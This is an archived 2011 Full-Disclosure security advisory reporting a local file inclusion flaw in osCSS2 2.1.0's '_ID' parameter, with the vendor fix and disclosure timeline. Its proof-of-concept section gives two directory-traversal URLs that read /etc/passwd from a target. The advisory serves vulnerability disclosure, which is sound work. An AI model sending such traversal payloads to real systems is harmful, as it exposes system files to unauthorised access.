lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <1RO6QQ-0MLdRY0@fwd21.aul.t-online.de> Date: Wed, 09 Nov 2011 12:34:38 +0100 From: "SSchurtz@...nline.de" <SSchurtz@...nline.de> To: full-disclosure@...ts.grok.org.uk Subject: osCSS2 "_ID" parameter Local file inclusion Advisory: osCSS2 "_ID" parameter Local file inclusion Advisory ID: SSCHADV2011-034 Author: Stefan Schurtz Affected Software: Successfully tested on osCSS2 2.1.0 (latest version) Vendor URL: http://oscss.org/ Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1 ========================== Vulnerability Description ========================== osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability ================== PoC-Exploit ================== http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd ========= Solution ========= Fixed in svn branche 2.1.0 and reported in develop version 2.1.1 ==================== Disclosure Timeline ==================== 08-Nov-2011 - informed vendor 08-Nov-2011 - release date of this security advisory 08-Nov-2011 - fixed by vendor 08-Nov-2011 - post on BugTraq ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://oscss.org/ http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html http://dev.oscss.org/task/892 http://www.rul3z.de/advisories/SSCHADV2011-034.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists